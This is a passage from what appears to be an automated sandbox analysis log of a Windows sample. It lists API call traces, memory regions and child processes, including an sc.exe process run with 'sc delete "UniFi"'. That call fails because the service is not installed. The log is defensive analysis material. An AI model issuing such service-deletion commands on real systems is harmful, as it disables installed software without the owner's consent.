dwDesiredAccess=0x10000) returned 0x0 [0079.885] GetLastError () returned 0x424 [0079.885] _ultow (in: _Dest=0x424, _Radix=-1673922440 | out: _Dest=0x424) returned="1060" [0079.885] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0079.887] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xcb9c39f830, nSize=0x2, Arguments=0xcb9c39f860 | out: lpBuffer="鎰鱚Ë") returned 0x62 [0079.887] GetFileType (hFile=0x24) returned 0x2 [0079.887] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xcb9c39f7e0 | out: lpMode=0xcb9c39f7e0) returned 1 [0079.942] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xcb9c5a93b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xcb9c39f7d8, lpReserved=0x0 | out: lpBuffer=0xcb9c5a93b0*, lpNumberOfCharsWritten=0xcb9c39f7d8*=0x62) returned 1 [0079.942] LocalFree (hMem=0xcb9c5a93b0) returned 0x0 [0079.942] LocalFree (hMem=0x0) returned 0x0 [0079.942] CloseServiceHandle (hSCObject=0xcb9c5a8d70) returned 1 [0079.942] LocalFree (hMem=0x0) returned 0x0 [0079.942] exit (_Code=1060) Thread: id = 356 os_tid = 0x1360 Process: id = "78" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xf204000" os_pid = "0xe44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"UniFi\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1517 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1518 start_va = 0xd4e0780000 end_va = 0xd4e079ffff entry_point = 0x0 region_type = private name = "private_0x000000d4e0780000" filename = "" Region: id = 1519 start_va = 0xd4e07a0000 end_va = 0xd4e07b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4e07a0000" filename = "" Region: id = 1520 start_va = 0xd4e07c0000 end_va = 0xd4e083ffff entry_point = 0x0 region_type = private name = "private_0x000000d4e07c0000" filename = "" Region: id = 1521 start_va = 0xd4e0840000 end_va = 0xd4e0843fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4e0840000" filename = "" Region: id = 1522 start_va = 0xd4e0850000 end_va = 0xd4e0850fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4e0850000" filename = "" Region: id = 1523 start_va = 0xd4e0860000 end_va = 0xd4e0861fff entry_point = 0x0 region_type = private name = "private_0x000000d4e0860000" filename = "" Region: id = 1524 start_va = 0x7df5ff5d0000 end_va = 0x7ff5ff5cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff5d0000" filename = "" Region: id = 1525 start_va = 0x7ff67ab30000 end_va = 0x7ff67ab52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67ab30000" filename = "" Region: id = 1526 start_va = 0x7ff67ab58000 end_va = 0x7ff67ab58fff entry_point = 0x0 region_type = private name = "private_0x00007ff67ab58000" filename = "" Region: id = 1527 start_va = 0x7ff67ab5e000 end_va = 0x7ff67ab5ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67ab5e000" filename = "" Region: id = 1528 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1529 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1759 start_va = 0xd4e0870000 end_va = 0xd4e096ffff entry_point = 0x0 region_type = private name = "private_0x000000d4e0870000" filename = "" Region: id = 1760 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1761 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5519 start_va = 0xd4e0780000 end_va = 0xd4e078ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d4e0780000" filename = "" Region: id = 5520 start_va = 0xd4e0790000 end_va = 0xd4e0796fff entry_point = 0x0 region_type = private name = "private_0x000000d4e0790000" filename = "" Region: id = 5521 start_va = 0xd4e0970000 end_va = 0xd4e0a2dfff entry_point = 0xd4e0970000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5522 start_va = 0xd4e0a30000 end_va = 0xd4e0aaffff entry_point = 0x0 region_type = private name = "private_0x000000d4e0a30000" filename = "" Region: id = 5523 start_va = 0xd4e0b10000 end_va = 0xd4e0b1ffff entry_point = 0x0 region_type = private name = "private_0x000000d4e0b10000" filename = "" Region: id = 5524 start_va = 0x7ff67aa30000 end_va = 0x7ff67ab2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67aa30000" filename = "" Region: id = 5525 start_va = 0x7ff67ab5c000 end_va = 0x7ff67ab5dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67ab5c000" filename = "" Region: id = 5526 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5527 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5536 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5537 start_va = 0xd4e0ab0000 end_va = 0xd4e0ab6fff entry_point = 0x0 region_type = private name = "private_0x000000d4e0ab0000" filename = "" Region: id = 5538 start_va = 0xd4e0b20000 end_va = 0xd4e0bfefff entry_point = 0xd4e0b20000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5539 start_va = 0xd4e0ac0000 end_va = 0xd4e0ad1fff entry_point = 0xd4e0ac0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 106 os_tid = 0xe48 [0079.679] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0079.679] __set_app_type (_Type=0x1) [0079.679] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0079.679] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0079.679] SetThreadUILanguage (LangId=0x0) returned 0x409 [0079.758] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0079.758] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0079.758] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0079.758] _wcsicmp (_String1="delete", _String2="query") returned -13 [0079.758] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0079.758] _wcsicmp (_String1="delete", _String2="start") returned -15 [0079.758] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0079.758] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0079.758] _wcsicmp (_String1="delete", _String2="control") returned 1 [0079.758] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0079.758] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0079.758] _wcsicmp (_String1="delete", _String2="config") returned 1 [0079.758] _wcsicmp (_String1="delete", _String2="description") returned -7 [0079.758] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0079.758] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0079.758] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0079.758] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0079.758] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0079.758] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0079.758] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0079.758] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0079.758] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0079.758] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0079.758] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0079.758] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0079.758] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0079.758] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0079.758] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0079.758] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0079.758] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0079.758] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0079.758] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0079.758] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0079.758] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0079.759] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0079.760] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xd4e0878cb0 [0079.765] OpenServiceW (hSCManager=0xd4e0878cb0, lpServiceName="UniFi", dwDesiredAccess=0x10000) returned 0x0 [0079.765] GetLastError () returned 0x424 [0079.765] _ultow (in: _Dest=0x424, _Radix=-528220888 | out: _Dest=0x424) returned="1060" [0079.765] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0079.766] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xd4e083fce0, nSize=0x2, Arguments=0xd4e083fd10 | out: lpBuffer="鎰Ô") returned 0x62 [0079.766] GetFileType (hFile=0x24) returned 0x2 [0079.766] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xd4e083fc90 | out: lpMode=0xd4e083fc90) returned 1 [0079.802] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xd4e08793b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xd4e083fc88, lpReserved=0x0 | out: lpBuffer=0xd4e08793b0*, lpNumberOfCharsWritten=0xd4e083fc88*=0x62) returned 1 [0079.802] LocalFree (hMem=0xd4e08793b0) returned 0x0 [0079.802] LocalFree (hMem=0x0) returned 0x0 [0079.802] CloseServiceHandle (hSCObject=0xd4e0878cb0) returned 1 [0079.802] LocalFree (hMem=0x0) returned 0x0 [0079.802] exit (_Code=1060) Thread: id = 353 os_tid = 0x1354 Process: id = "79" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7756f000" os_pid = "0xe58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x6c8" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1815 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1816 start_va = 0xe743df0000 end_va = 0xe743e0ffff entry_point = 0x0 region_type = private name = "private_0x000000e743df0000" filename = "" Region: id = 1817 start_va = 0xe743e10000 end_va = 0xe743e23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e743e10000" filename = "" Region: id = 1818 start_va = 0xe743e30000 end_va = 0xe743e6ffff entry_point = 0x0 region_type = private name = "private_0x000000e743e30000" filename = "" Region: id = 1819 start_va = 0x7df5ff7d0000 end_va = 0x7ff5ff7cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff7d0000" filename = "" Region: id = 1820 start_va = 0x7ff6c3ea0000 end_va = 0x7ff6c3ec2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3ea0000" filename = "" Region: id = 1821 start_va = 0x7ff6c3ecd000 end_va = 0x7ff6c3ecefff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3ecd000" filename = "" Region: id = 1822 start_va = 0x7ff6c3ecf000 end_va = 0x7ff6c3ecffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3ecf000" filename = "" Region: id = 1823 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1824 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1825 start_va = 0xe743f40000 end_va = 0xe74403ffff entry_point = 0x0 region_type = private name = "private_0x000000e743f40000" filename = "" Region: id = 1826 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1827 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2375 start_va = 0xe743df0000 end_va = 0xe743dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e743df0000" filename = "" Region: id = 2376 start_va = 0xe743e00000 end_va = 0xe743e06fff entry_point = 0x0 region_type = private name = "private_0x000000e743e00000" filename = "" Region: id = 2377 start_va = 0xe743e70000 end_va = 0xe743f2dfff entry_point = 0xe743e70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2378 start_va = 0xe743f30000 end_va = 0xe743f30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e743f30000" filename = "" Region: id = 2379 start_va = 0xe744040000 end_va = 0xe74407ffff entry_point = 0x0 region_type = private name = "private_0x000000e744040000" filename = "" Region: id = 2380 start_va = 0xe744080000 end_va = 0xe744086fff entry_point = 0x0 region_type = private name = "private_0x000000e744080000" filename = "" Region: id = 2381 start_va = 0xe744090000 end_va = 0xe744090fff entry_point = 0x0 region_type = private name = "private_0x000000e744090000" filename = "" Region: id = 2382 start_va = 0xe7440a0000 end_va = 0xe7440a0fff entry_point = 0x0 region_type = private name = "private_0x000000e7440a0000" filename = "" Region: id = 2383 start_va = 0xe7441d0000 end_va = 0xe7441dffff entry_point = 0x0 region_type = private name = "private_0x000000e7441d0000" filename = "" Region: id = 2384 start_va = 0xe7441e0000 end_va = 0xe744367fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e7441e0000" filename = "" Region: id = 2385 start_va = 0xe744370000 end_va = 0xe7444f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e744370000" filename = "" Region: id = 2386 start_va = 0xe744500000 end_va = 0xe7458fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e744500000" filename = "" Region: id = 2387 start_va = 0x7ff6c3da0000 end_va = 0x7ff6c3e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3da0000" filename = "" Region: id = 2388 start_va = 0x7ff6c3ecb000 end_va = 0x7ff6c3eccfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3ecb000" filename = "" Region: id = 2389 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2390 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2391 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2392 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2393 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2394 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2395 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2396 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2397 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2398 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2399 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2400 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3976 start_va = 0xe7440b0000 end_va = 0xe7440effff entry_point = 0x0 region_type = private name = "private_0x000000e7440b0000" filename = "" Region: id = 3977 start_va = 0xe7441c0000 end_va = 0xe7441cffff entry_point = 0x0 region_type = private name = "private_0x000000e7441c0000" filename = "" Region: id = 3978 start_va = 0xe7459e0000 end_va = 0xe7459effff entry_point = 0x0 region_type = private name = "private_0x000000e7459e0000" filename = "" Region: id = 3979 start_va = 0xe7459f0000 end_va = 0xe745d26fff entry_point = 0xe7459f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3980 start_va = 0xe745d30000 end_va = 0xe745f4bfff entry_point = 0x0 region_type = private name = "private_0x000000e745d30000" filename = "" Region: id = 3981 start_va = 0xe745f50000 end_va = 0xe74616afff entry_point = 0x0 region_type = private name = "private_0x000000e745f50000" filename = "" Region: id = 3982 start_va = 0xe746170000 end_va = 0xe746279fff entry_point = 0x0 region_type = private name = "private_0x000000e746170000" filename = "" Region: id = 3983 start_va = 0xe746280000 end_va = 0xe746499fff entry_point = 0x0 region_type = private name = "private_0x000000e746280000" filename = "" Region: id = 3984 start_va = 0xe7464a0000 end_va = 0xe7465a8fff entry_point = 0x0 region_type = private name = "private_0x000000e7464a0000" filename = "" Region: id = 3985 start_va = 0x7ff6c3ec9000 end_va = 0x7ff6c3ecafff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3ec9000" filename = "" Region: id = 3986 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3987 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3988 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3989 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3990 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 3991 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3992 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3993 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3994 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 110 os_tid = 0xe5c Thread: id = 155 os_tid = 0xfb8 Thread: id = 198 os_tid = 0x1004 Thread: id = 272 os_tid = 0x1170 Process: id = "80" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x77a77000" os_pid = "0xe60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "37" os_parent_pid = "0xcfc" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1831 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1832 start_va = 0xb418900000 end_va = 0xb41891ffff entry_point = 0x0 region_type = private name = "private_0x000000b418900000" filename = "" Region: id = 1833 start_va = 0xb418920000 end_va = 0xb418933fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b418920000" filename = "" Region: id = 1834 start_va = 0xb418940000 end_va = 0xb41897ffff entry_point = 0x0 region_type = private name = "private_0x000000b418940000" filename = "" Region: id = 1835 start_va = 0x7df5ff3e0000 end_va = 0x7ff5ff3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff3e0000" filename = "" Region: id = 1836 start_va = 0x7ff6c48e0000 end_va = 0x7ff6c4902fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c48e0000" filename = "" Region: id = 1837 start_va = 0x7ff6c4906000 end_va = 0x7ff6c4906fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4906000" filename = "" Region: id = 1838 start_va = 0x7ff6c490e000 end_va = 0x7ff6c490ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c490e000" filename = "" Region: id = 1839 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1840 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1841 start_va = 0xb418b30000 end_va = 0xb418c2ffff entry_point = 0x0 region_type = private name = "private_0x000000b418b30000" filename = "" Region: id = 1842 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1843 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3290 start_va = 0xb418900000 end_va = 0xb41890ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b418900000" filename = "" Region: id = 3291 start_va = 0xb418910000 end_va = 0xb418916fff entry_point = 0x0 region_type = private name = "private_0x000000b418910000" filename = "" Region: id = 3292 start_va = 0xb418980000 end_va = 0xb418a3dfff entry_point = 0xb418980000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3293 start_va = 0xb418a40000 end_va = 0xb418a7ffff entry_point = 0x0 region_type = private name = "private_0x000000b418a40000" filename = "" Region: id = 3294 start_va = 0xb418a80000 end_va = 0xb418a80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b418a80000" filename = "" Region: id = 3295 start_va = 0xb418a90000 end_va = 0xb418a96fff entry_point = 